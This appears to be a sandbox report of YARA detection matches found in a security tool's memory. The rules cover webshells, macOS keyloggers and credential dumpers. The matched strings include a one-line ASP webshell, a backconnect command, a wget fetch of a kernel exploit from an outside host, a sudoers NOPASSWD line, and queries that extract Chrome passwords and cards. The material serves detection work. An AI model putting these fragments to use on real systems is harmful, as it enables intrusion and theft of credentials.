| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_DevPack_2005 | Webshells Auto-generated - file 2005.asp | Yara Bulk Rule Generator by Florian Roth | - 0x51bb2:$s7: theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath("/")),"")
- 0x51c07:$s8: scrollbar-darkshadow-color:#9C9CD3;
- 0x51c2f:$s9: scrollbar-face-color:#E4E4F3;
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | _root_040_zip_Folder_deploy | Webshells Auto-generated - file deploy.exe | Yara Bulk Rule Generator by Florian Roth | - 0x51d16:$s5: halon synscan 127.0.0.1 1-65536
- 0x51d3a:$s8: Obviously you replace the ip address with that of the target.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | by063cli | Webshells Auto-generated - file by063cli.exe | Yara Bulk Rule Generator by Florian Roth | - 0x51e30:$s2: #popmsghello,are you all right?
- 0x51e54:$s4: connect failed,check your network and remote ip.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | icyfox007v1_10_rar_Folder_asp | Webshells Auto-generated - file asp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x51f4d:$s0: <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_EFSO_2_2 | Webshells Auto-generated - file EFSO_2.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4fda3:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x52056:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x4fdf8:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x520ab:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | byshell063_ntboot_2 | Webshells Auto-generated - file ntboot.dll | Yara Bulk Rule Generator by Florian Roth | - 0x521bd:$s6: OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | u_uay | Webshells Auto-generated - file uay.exe | Yara Bulk Rule Generator by Florian Roth | - 0x522a7:$s1: exec "c:\WINDOWS\System32\freecell.exe
- 0x522d2:$s9: SYSTEM\CurrentControlSet\Services\uay.sys\Security
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | bin_wuaus | Webshells Auto-generated - file wuaus.dll | Yara Bulk Rule Generator by Florian Roth | - 0x523bb:$s1: 9(90989@9V9^9f9n9v9
- 0x523d3:$s2: :(:,:0:4:8:C:H:N:T:Y:_:e:o:y:
- 0x523f5:$s3: ;(=@=G=O=T=X=\=
- 0x52409:$s4: TCP Send Error!!
- 0x5241e:$s5: 1"1;1X1^1e1m1w1~1
- 0x52434:$s8: =$=)=/=<=Y=_=j=p=z=
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | pwreveal | Webshells Auto-generated - file pwreveal.exe | Yara Bulk Rule Generator by Florian Roth | - 0x52500:$s0: *<Blank - no es
- 0x52514:$s3: JDiamondCS
- 0x52524:$s8: sword set> [Leith=0 bytes]
- 0x52543:$s9: ION\System\Floating-
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shelltools_g0t_root_xwhois | Webshells Auto-generated - file xwhois.exe | Yara Bulk Rule Generator by Florian Roth | - 0x52620:$s1: rting!
- 0x5262c:$s2: aTypCog(
- 0x4a2bd:$s5: Diamond
- 0x4bb9d:$s5: Diamond
- 0x4d90e:$s5: Diamond
- 0x52515:$s5: Diamond
- 0x52639:$s5: Diamond
- 0x52645:$s6: r)r=rQreryr
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | vanquish_2 | Webshells Auto-generated - file vanquish.exe | Yara Bulk Rule Generator by Florian Roth | - 0x5270b:$s2: Vanquish - DLL injection failed:
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | down_rar_Folder_down | Webshells Auto-generated - file down.asp | Yara Bulk Rule Generator by Florian Roth | - 0x527ec:$s0: response.write "<font color=blue size=2>NetBios Name: \\" & Snet.ComputerName &
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | cmdShell | Webshells Auto-generated - file cmdShell.asp | Yara Bulk Rule Generator by Florian Roth | - 0x528f5:$s1: if cmdPath="wscriptShell" then
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ZXshell2_0_rar_Folder_nc | Webshells Auto-generated - file nc.exe | Yara Bulk Rule Generator by Florian Roth | - 0x529d6:$s0: WSOCK32.dll
- 0x529e6:$s1: ?bSUNKNOWNV
- 0x529f6:$s7: p@gram Jm6h)
- 0x52a07:$s8: ser32.dllCONFP@
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | portlessinst | Webshells Auto-generated - file portlessinst.exe | Yara Bulk Rule Generator by Florian Roth | - 0x52ad7:$s2: Fail To Open Registry
- 0x52af1:$s3: f<-WLEggDr"
- 0x52b01:$s6: oMemoryCreateP
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SetupBDoor | Webshells Auto-generated - file SetupBDoor.exe | Yara Bulk Rule Generator by Florian Roth | - 0x52bcc:$s1: \BDoor\SetupBDoor
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phpshell_3 | Webshells Auto-generated - file phpshell.php | Yara Bulk Rule Generator by Florian Roth | - 0x1b56f:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x34605:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x52c98:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x52ce0:$s5: echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | BIN_Server | Webshells Auto-generated - file Server.exe | Yara Bulk Rule Generator by Florian Roth | - 0x52de8:$s0: configserver
- 0x52df9:$s1: GetLogicalDrives
- 0x52e0e:$s2: WinExec
- 0x52e1a:$s4: fxftest
- 0x52e26:$s5: upfileok
- 0x52e33:$s7: upfileer
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop2006_rar_Folder_2006 | Webshells Auto-generated - file 2006.asp | Yara Bulk Rule Generator by Florian Roth | - 0x52f01:$s6: strBackDoor = strBackDoor
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | r57shell_3 | Webshells Auto-generated - file r57shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x52fd6:$s1: <b>".$_POST['cmd']
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HDConfig | Webshells Auto-generated - file HDConfig.exe | Yara Bulk Rule Generator by Florian Roth | - 0x530a1:$s0: An encryption key is derived from the password hash.
- 0x530db:$s3: A hash object has been created.
- 0x53100:$s4: Error during CryptCreateHash!
- 0x53122:$s5: A new key container has been created.
- 0x5314c:$s6: The password has been added to the hash.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_ajan_2 | Webshells Auto-generated - file ajan.asp | Yara Bulk Rule Generator by Florian Roth | - 0x23c3e:$s2: "Set WshShell = CreateObject(""WScript.Shell"")
- 0x5322e:$s2: "Set WshShell = CreateObject(""WScript.Shell"")
- 0x53262:$s3: /file.zip
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_and_Exploit_CN_APT_HK | Webshell and Exploit Code in relation with APT against Honk Kong protesters | Florian Roth | - 0x53353:$a0: <script language=javascript src=http://java-se.com/o.js</script>
- 0x53398:$s0: <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
- 0x53400:$s1: <input type="hidden" name="doing" value="login">
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JSP_Browser_APT_webshell | VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a | F.Roth | - 0x534d3:$a1a: private static final String[] COMMAND_INTERPRETER = {"
- 0x5350f:$a1b: cmd", "/C"}; // Dos,Windows
- 0x5352f:$a2: Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
- 0x5357b:$a3: ret.append("!!!! Process has timed out, destroyed !!!!!");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JSP_jfigueiredo_APT_webshell | JSP Browser used as web shell by APT groups - author: jfigueiredo | F.Roth | - 0x53698:$a1: String fhidden = new String(Base64.encodeBase64(path.getBytes()));
- 0x536df:$a2: <form id="upload" name="upload" action="ServFMUpload" method="POST" enctype="multipart/form-data">
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JSP_jfigueiredo_APT_webshell_2 | JSP Browser used as web shell by APT groups - author: jfigueiredo | F.Roth | - 0x5381b:$a1: <div id="bkorotator"><img alt="" src="images/rotator/1.jpg"></div>
- 0x53862:$a2: $("#dialog").dialog("destroy");
- 0x53886:$s1: <form id="form" action="ServFMUpload" method="post" enctype="multipart/form-data">
- 0x538dd:$s2: <input type="hidden" id="fhidden" name="fhidden" value="L3BkZi8=" />
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_Insomnia | Insomnia Webshell - file InsomniaShell.aspx | Florian Roth | - 0x53a5c:$s0: Response.Write("- Failed to create named pipe:");
- 0x53a92:$s1: Response.Output.Write("+ Sending {0}<br>", command);
- 0x53acb:$s2: String command = "exec master..xp_cmdshell 'dir > \\\\127.0.0.1
- 0x53b0f:$s3: Response.Write("- Error Getting User Info<br>");
- 0x53b44:$s4: string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes,
- 0x53b8b:$s5: [DllImport("Advapi32.dll", SetLastError = true)]
- 0x53bc0:$s9: username = DumpAccountSid(tokUser.User.Sid);
- 0x53bf2:$s14: //Response.Output.Write("Opened process PID: {0} : {1}<br>", p
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SoakSoak_Infected_Wordpress | Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX | Florian Roth | - 0x53e23:$s0: wp_enqueue_script("swfobject");
- 0x53e47:$s1: function FuncQueueObject()
- 0x53e66:$s2: add_action("wp_enqueue_scripts", 'FuncQueueObject');
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Pastebin_Webshell | Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs | Florian Roth | - 0x53f90:$s0: file_get_contents("http://pastebin.com
- 0x53fbb:$s1: xcurl('http://pastebin.com/download.php
- 0x53fe7:$s2: xcurl('http://pastebin.com/raw.php
- 0x5400e:$x0: if($content){unlink('evex.php');
- 0x54033:$x1: $fh2 = fopen("evex.php", 'a');
- 0x54056:$y0: file_put_contents($pth
- 0x54071:$y1: echo "<login_ok>
- 0x54086:$y2: str_replace('* @package Wordpress',$temp
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ASPXspy2 | Web shell - file ASPXspy2.aspx | Florian Roth | - 0x54183:$s0: string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin
- 0x541cf:$s1: SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" O
- 0x5421e:$s3: Process[] p=Process.GetProcesses();
- 0x54246:$s4: Response.Cookies.Add(new HttpCookie(vbhLn,Password));
- 0x54280:$s5: [DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
- 0x542bb:$s6: <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssCl
- 0x5430c:$s7: ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
- 0x54361:$s8: Copyright © 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_bla
- 0x543b4:$s10: Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.
- 0x54406:$s11: nxeDR.Command+=new CommandEventHandler(this.iVk);
- 0x5443d:$s12: <%@ import Namespace="System.ServiceProcess"%>
- 0x54471:$s13: foreach(string innerSubKey in sk.GetSubKeyNames())
- 0x544a9:$s17: Response.Redirect("http://www.rootkit.net.cn");
- 0x544de:$s20: else if(Reg_Path.StartsWith("HKEY_USERS"))
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_27_9_c66_c99 | Detects Webshell - rule generated from from files 27.9.txt, c66.php, c99-shadows-mod.php, c99.php ... | Florian Roth | - 0x548fa:$s4: if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
- 0x5493e:$s6: @extract($_REQUEST["c99shcook"]);
- 0x54964:$s7: if (!function_exists("c99_buff_prepare"))
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_acid_AntiSecShell_3 | Detects Webshell Acid | Florian Roth | - 0x54f76:$s0: echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
- 0x54fcf:$s1: if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_c99_4 | Detects C99 Webshell | Florian Roth | - 0x554df:$s1: displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
- 0x55522:$s2: displaysecinfo("RAM",myshellexec("free -m"));
- 0x55554:$s3: displaysecinfo("Where is perl?",myshellexec("whereis perl"));
- 0x55596:$s4: $ret = myshellexec($handler);
- 0x555b8:$s5: if (posix_kill($pid,$sig)) {echo "OK.";}
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_r57shell_2 | Detects Webshell R57 | Florian Roth | - 0x55a57:$s1: $connection = @ftp_connect($ftp_server,$ftp_port,10);
- 0x55a91:$s2: echo $lang[$language.'_text98'].$suc."\r\n";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_27_9_acid_c99_locus7s | Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt | Florian Roth | - 0x55e19:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
- 0x55e77:$s1: $_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_Backdoor_PHP_Agent_r57_mod_bizzz_shell_r57 | Detects Webshell - rule generated from from files Backdoor.PHP.Agent.php, r57.mod-bizzz.shell.txt ... | Florian Roth | - 0x56334:$s1: $_POST['cmd'] = which('
- 0x55e19:$s2: $blah = ex(
- 0x56350:$s2: $blah = ex(
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_c100 | Detects Webshell - rule generated from from files c100 v. 777shell | Florian Roth | - 0x5664c:$s0: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)
- 0x566c2:$s1: <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search">
- 0x2b0b5:$s3: cut -d: -f1,2,3 /etc/passwd | grep ::
- 0x5671f:$s3: cut -d: -f1,2,3 /etc/passwd | grep ::
- 0x56749:$s4: which wget curl w3m lynx
- 0x56766:$s6: netstat -atup | grep IST
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_AcidPoison | Detects Poison Sh3ll - Webshell | Florian Roth | - 0x56b28:$s1: elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_acid_FaTaLisTiCz_Fx_fx_p0isoN_sh3ll_x0rg_byp4ss_256 | Detects Webshell - rule generated from from files acid.php, FaTaLisTiCz_Fx.txt, fx.txt, p0isoN.sh3ll.txt, x0rg.byp4ss.txt | Florian Roth | - 0x56dd0:$s0: <form method="POST"><input type=hidden name=act value="ls">
- 0x56e10:$s2: foreach($quicklaunch2 as $item) {
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_exploit_cve_5889 | http://www.cvedetails.com/cve/cve-2015-5889 | @mimeframe | - 0x3290ae:$a1: /etc/sudoers
- 0x3290c7:$a2: /etc/crontab
- 0x3290e0:$a3: * * * * * root echo
- 0x375b38:$a3: * * * * * root echo
- 0x329100:$a4: ALL ALL=(ALL) NOPASSWD: ALL
- 0x375b4e:$a4: ALL ALL=(ALL) NOPASSWD: ALL
- 0x329128:$a5: /usr/bin/rsh
- 0x81aec:$a6: localhost
- 0x820f5:$a6: localhost
- 0x103d9f:$a6: localhost
- 0x1043a8:$a6: localhost
- 0x110f5e:$a6: localhost
- 0x11287b:$a6: localhost
- 0x157cb2:$a6: localhost
- 0x158a0b:$a6: localhost
- 0x169be6:$a6: localhost
- 0x16a502:$a6: localhost
- 0x2cf7c0:$a6: localhost
- 0x2e20ff:$a6: localhost
- 0x329141:$a6: localhost
- 0x336d74:$a6: localhost
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_exploit_tpwn | tpwn exploits a null pointer dereference in XNU to escalate privileges to root. | @mimeframe | - 0x329278:$a1: [-] Couldn't find a ROP gadget, aborting.
- 0x375c4d:$a1: [-] Couldn't find a ROP gadget, aborting.
- 0x3292ae:$a2: leaked kaslr slide,
- 0x375c79:$a2: leaked kaslr slide,
- 0x3292ce:$a3: didn't get root, but this system is vulnerable.
- 0x375c8f:$a3: didn't get root, but this system is vulnerable.
- 0x32930a:$a4: Escalating privileges! -qwertyoruiop
- 0x375cc1:$a4: Escalating privileges! -qwertyoruiop
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_juuso_keychaindump | For reading OS X keychain passwords as root. | @mimeframe | - 0x32942c:$a1: [-] Too many candidate keys to fit in memory
- 0x375d7e:$a1: [-] Too many candidate keys to fit in memory
- 0x329465:$a2: [-] Could not allocate memory for key search
- 0x375dad:$a2: [-] Could not allocate memory for key search
- 0x32949e:$a3: [-] Too many credentials to fit in memory
- 0x375ddc:$a3: [-] Too many credentials to fit in memory
- 0x3294d4:$a4: [-] The target file is not a keychain file
- 0x375e08:$a4: [-] The target file is not a keychain file
- 0x32950b:$a5: [-] Could not find the securityd process
- 0x375e35:$a5: [-] Could not find the securityd process
- 0x329540:$a6: [-] No root privileges, please run with sudo
- 0x375e60:$a6: [-] No root privileges, please run with sudo
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_b4rsby_swiftlog | Dirty user level command line keylogger hacked together in Swift. | @mimeframe | - 0x329683:$a1: You need to enable the keylogger in the System Prefrences
- 0x375f3e:$a1: You need to enable the keylogger in the System Prefrences
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_caseyscarborough | A simple and easy to use keylogger for macOS. | @mimeframe | - 0x3297cb:$a1: /var/log/keystroke.log
- 0x32997c:$a1: /var/log/keystroke.log
- 0x376021:$a1: /var/log/keystroke.log
- 0x37614f:$a1: /var/log/keystroke.log
- 0x3297ee:$a2: ERROR: Unable to create event tap.
- 0x329cb6:$a2: ERROR: Unable to create event tap.
- 0x37603a:$a2: ERROR: Unable to create event tap.
- 0x37638d:$a2: ERROR: Unable to create event tap.
- 0x32981d:$a3: Keylogging has begun.
- 0x37605f:$a3: Keylogging has begun.
- 0x32983f:$a4: ERROR: Unable to open log file. Ensure that you have the proper permissions.
- 0x376077:$a4: ERROR: Unable to open log file. Ensure that you have the proper permissions.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_dannvix | A simple keylogger for macOS. | @mimeframe | - 0x3297cb:$a1: /var/log/keystroke.log
- 0x32997c:$a1: /var/log/keystroke.log
- 0x376021:$a1: /var/log/keystroke.log
- 0x37614f:$a1: /var/log/keystroke.log
- 0x32999f:$a2: <forward-delete>
- 0x376168:$a2: <forward-delete>
- 0x415da:$a3: <unknown>
- 0x41b0c:$a3: <unknown>
- 0xc388d:$a3: <unknown>
- 0xc3dbf:$a3: <unknown>
- 0x3299bc:$a3: <unknown>
- 0x37617b:$a3: <unknown>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_eldeveloper_keystats | A simple keylogger for macOS. | @mimeframe | - 0x329ac2:$a1: YVBKeyLoggerPerishedNotification
- 0x37621c:$a1: YVBKeyLoggerPerishedNotification
- 0x329aef:$a2: YVBKeyLoggerPerishedByLackOfResponseNotification
- 0x37623f:$a2: YVBKeyLoggerPerishedByLackOfResponseNotification
- 0x329b2c:$a3: YVBKeyLoggerPerishedByUserChangeNotification
- 0x376272:$a3: YVBKeyLoggerPerishedByUserChangeNotification
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_giacomolaw | A simple keylogger for macOS. | @mimeframe | - 0x329c4b:$a1: ERROR: Unable to access keystroke log file. Please make sure you have the correct permissions.
- 0x37632c:$a1: ERROR: Unable to access keystroke log file. Please make sure you have the correct permissions.
- 0x3297ee:$a2: ERROR: Unable to create event tap.
- 0x329cb6:$a2: ERROR: Unable to create event tap.
- 0x37603a:$a2: ERROR: Unable to create event tap.
- 0x37638d:$a2: ERROR: Unable to create event tap.
- 0x329ce5:$a3: Keystrokes are now being recorded
- 0x3763b2:$a3: Keystrokes are now being recorded
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_logkext | LogKext is an open source keylogger for Mac OS X, a product of FSB software. | @mimeframe | - 0x329e22:$a1: logKextPassKey
- 0x329f2b:$a1: logKextPassKey
- 0x37648a:$a1: logKextPassKey
- 0x376557:$a1: logKextPassKey
- 0x329e3d:$a2: Couldn't get system keychain:
- 0x37649b:$a2: Couldn't get system keychain:
- 0x329e67:$a3: Error finding secret in keychain
- 0x3764bb:$a3: Error finding secret in keychain
- 0x329e94:$a4: com_fsb_iokit_logKext
- 0x3764de:$a4: com_fsb_iokit_logKext
- 0x329eb6:$b1: logKext Password:
- 0x3764f6:$b1: logKext Password:
- 0x329ed4:$b2: Logging controls whether the daemon is logging keystrokes (default is on).
- 0x37650a:$b2: Logging controls whether the daemon is logging keystrokes (default is on).
- 0x329e22:$c1: logKextPassKey
- 0x329f2b:$c1: logKextPassKey
- 0x37648a:$c1: logKextPassKey
- 0x376557:$c1: logKextPassKey
- 0x329f46:$c2: Error: couldn't create secAccess
- 0x376568:$c2: Error: couldn't create secAccess
- 0x329f73:$d1: IOHIKeyboard
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_roxlu_ofxkeylogger | ofxKeylogger keylogger. | @mimeframe | - 0x32a0cf:$a1: keylogger_init
- 0x37666e:$a1: keylogger_init
- 0x32a0ea:$a2: install_keylogger_hook function not found in dll.
- 0x37667f:$a2: install_keylogger_hook function not found in dll.
- 0x32a128:$a3: keylogger_set_callback
- 0x3766b3:$a3: keylogger_set_callback
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_skreweverything_swift | It is a simple and easy to use keylogger for macOS written in Swift. | @mimeframe | - 0x32a26e:$a1: Can't create directories!
- 0x376794:$a1: Can't create directories!
- 0x32a294:$a2: Can't create manager
- 0x3767b0:$a2: Can't create manager
- 0x32a2b5:$a3: Can't open HID!
- 0x3767c7:$a3: Can't open HID!
- 0x32a2d1:$a4: PRINTSCREEN
- 0x3767d9:$a4: PRINTSCREEN
- 0x32a2e9:$a5: LEFTARROW
- 0x3767e7:$a5: LEFTARROW
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_macpmem | MacPmem enables read/write access to physical memory on macOS. Can be used by CSIRT teams and attackers. | @mimeframe | - 0x32a43a:$a1: %s/MacPmem.kext
- 0x3768d3:$a1: %s/MacPmem.kext
- 0x32a456:$a2: The Pmem physical memory imager.
- 0x3768e5:$a2: The Pmem physical memory imager.
- 0x32a483:$a3: The OSXPmem memory imager.
- 0x376908:$a3: The OSXPmem memory imager.
- 0x32a4aa:$a4: These AFF4 Volumes will be loaded and their metadata will be parsed before the program runs.
- 0x376925:$a4: These AFF4 Volumes will be loaded and their metadata will be parsed before the program runs.
- 0x32a513:$a5: Pmem driver version incompatible. Reported
- 0x376984:$a5: Pmem driver version incompatible. Reported
- 0x32a54a:$a6: Memory access driver left loaded since you specified the -l flag.
- 0x3769b1:$a6: Memory access driver left loaded since you specified the -l flag.
- 0x32a598:$b1: Unloading MacPmem
- 0x3769f5:$b1: Unloading MacPmem
- 0x32a5b6:$b2: MacPmem load tag is
- 0x376a09:$b2: MacPmem load tag is
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_manwhoami_icloudcontacts | Pulls iCloud Contacts for an account. No dependencies. No user notification. | @mimeframe | - 0x32a6f3:$a1: https://setup.icloud.com/setup/authenticate/
- 0x376ae1:$a1: https://setup.icloud.com/setup/authenticate/
- 0x32a72c:$a2: https://p04-contacts.icloud.com/
- 0x376b10:$a2: https://p04-contacts.icloud.com/
- 0x32a759:$a3: HTTP Error 401: Unauthorized. Are you sure the credentials are correct?
- 0x376b33:$a3: HTTP Error 401: Unauthorized. Are you sure the credentials are correct?
- 0x32a7ad:$a4: HTTP Error 404: URL not found. Did you enter a username?
- 0x376b7d:$a4: HTTP Error 404: URL not found. Did you enter a username?
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_manwhoami_mmetokendecrypt | This program decrypts / extracts all authorization tokens on macOS / OS X / OSX. | @mimeframe | - 0x32a915:$a1: security find-generic-password -ws 'iCloud'
- 0x376c80:$a1: security find-generic-password -ws 'iCloud'
- 0x32a94d:$a2: ERROR getting iCloud Decryption Key
- 0x376cae:$a2: ERROR getting iCloud Decryption Key
- 0x32a97d:$a3: Could not find MMeTokenFile. You can specify the file manually.
- 0x376cd4:$a3: Could not find MMeTokenFile. You can specify the file manually.
- 0x32a9c9:$a4: Decrypting token plist ->
- 0x376d16:$a4: Decrypting token plist ->
- 0x32a9ef:$a5: Successfully decrypted token plist!
- 0x376d32:$a5: Successfully decrypted token plist!
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_manwhoami_osxchromedecrypt | Decrypt Google Chrome / Chromium passwords and credit cards on macOS / OS X. | @mimeframe | - 0x32ab40:$a1: Credit Cards for Chrome Profile
- 0x376e1e:$a1: Credit Cards for Chrome Profile
- 0x32ab6c:$a2: Passwords for Chrome Profile
- 0x376e40:$a2: Passwords for Chrome Profile
- 0x32ab95:$a3: Unknown Card Issuer
- 0x376e5f:$a3: Unknown Card Issuer
- 0x32abb5:$a4: ERROR getting Chrome Safe Storage Key
- 0x376e75:$a4: ERROR getting Chrome Safe Storage Key
- 0x32abe7:$b1: select name_on_card, card_number_encrypted, expiration_month, expiration_year from credit_cards
- 0x376e9d:$b1: select name_on_card, card_number_encrypted, expiration_month, expiration_year from credit_cards
- 0x32ac53:$b2: select username_value, password_value, origin_url, submit_element from logins
- 0x376eff:$b2: select username_value, password_value, origin_url, submit_element from logins
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_n0fate_chainbreaker | chainbreaker can extract user credential in a Keychain file with Master Key or user password in forensically sound manner. | @mimeframe | - 0x32adee:$a1: [!] Private Key Table is not available
- 0x377035:$a1: [!] Private Key Table is not available
- 0x32ae21:$a2: [!] Public Key Table is not available
- 0x37705e:$a2: [!] Public Key Table is not available
- 0x32ae53:$a3: [-] Decrypted Private Key
- 0x377086:$a3: [-] Decrypted Private Key
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_ptoomey3_keychain_dumper | Keychain dumping utility. | @mimeframe | - 0x32ae91:$a1: keychain_dumper
- 0x32af63:$a1: keychain_dumper
- 0x3770b7:$a1: keychain_dumper
- 0x377131:$a1: keychain_dumper
- 0x32af7f:$a2: /var/Keychains/keychain-2.db
- 0x377143:$a2: /var/Keychains/keychain-2.db
- 0x32afa8:$a3: <key>keychain-access-groups</key>
- 0x377162:$a3: <key>keychain-access-groups</key>
- 0x32afd6:$a4: SELECT DISTINCT agrp FROM genp UNION SELECT DISTINCT agrp FROM inet
- 0x377186:$a4: SELECT DISTINCT agrp FROM genp UNION SELECT DISTINCT agrp FROM inet
- 0x32b026:$a5: dumpEntitlements
- 0x3771cc:$a5: dumpEntitlements
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_bloodhound_owned | Bloodhound: Custom queries to document a compromise, find collateral spread of owned nodes, and visualize deltas in privilege gains | @fusionrace | - 0x32b194:$s1: Find all owned Domain Admins
- 0x32b1bd:$s2: Find Shortest Path from owned node to Domain Admins
- 0x32b1fd:$s3: List all directly owned nodes
- 0x32b227:$s4: Set owned and wave properties for a node
- 0x32b25c:$s5: Find spread of compromise for owned nodes in wave
- 0x32b29a:$s6: Show clusters of password reuse
- 0x32b2c6:$s7: Something went wrong when creating SharesPasswordWith relationship
- 0x32b315:$s8: reference doc of custom Cypher queries for BloodHound
- 0x32b357:$s9: Created SharesPasswordWith relationship between
- 0x32b393:$s10: Skipping finding spread of compromise due to
|
